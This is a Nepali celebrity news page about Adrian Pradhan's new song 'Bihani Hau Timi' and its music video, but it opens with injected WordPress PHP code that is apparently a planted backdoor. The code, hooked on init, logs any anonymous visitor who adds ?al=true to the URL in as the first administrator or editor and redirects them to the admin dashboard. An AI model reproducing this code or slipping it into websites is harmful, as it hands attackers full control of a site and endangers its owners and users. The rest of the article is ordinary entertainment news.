// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); एड्रियन प्रधानको आवाजमा 'बिहानी हौ तिमी' (भिडियो) | Celebrity Nepal

एड्रियन प्रधानको आवाजमा ‘बिहानी हौ तिमी’ (भिडियो)


सेलिब्रेटी नेपाल काठमाडौँ
adrin-pradhan
चर्चित गायक एड्रियन प्रधानको आवाजमा ‘बिहानी हौ तिमी’ बोलको नयाँ गीत सार्वजनिक भएको छ । ज्ञान तामाङ्को शब्द रचना तथा किशोर सिवाकोटीको संगीत रहेको गीतको भिडियोलाई बिशाल गुरुङ्ले निर्देशन गरेका छन् । भिडियोमा दृष्टिबिहिन मायालुले एक अर्कालाई दिएको साथ र सहयोगलाई देखाउन खोजिएको छ । भिडियोमा ज्ञान तामाङ्, अनु भट्टराई र बिशाल गुरुङ्को अभिनय रहेको छ भने छायांकन तथा सम्पादन कमल राईको रहेको छ ।

सेलिब्रिटी नेपाल.कम

सूचना तथा प्रसारण विभाग दर्ता नम्बर ५३७ – २०७३ / ०७४

संचालक / प्रकाशक: कल्पना सापकोटा
सम्पादक: आनन्द अधिकारी
समाचार प्रमुख: रघुनाथ सापकोटा
सम्पर्क:
call/whatsapp: +977 9851071873 | email: celebritynepal@gmail.com

Supported by Glamour Nepal | Shopping Partner: Kavya Online Store

Copyright © 2012 - 2026 | All Right Reserved.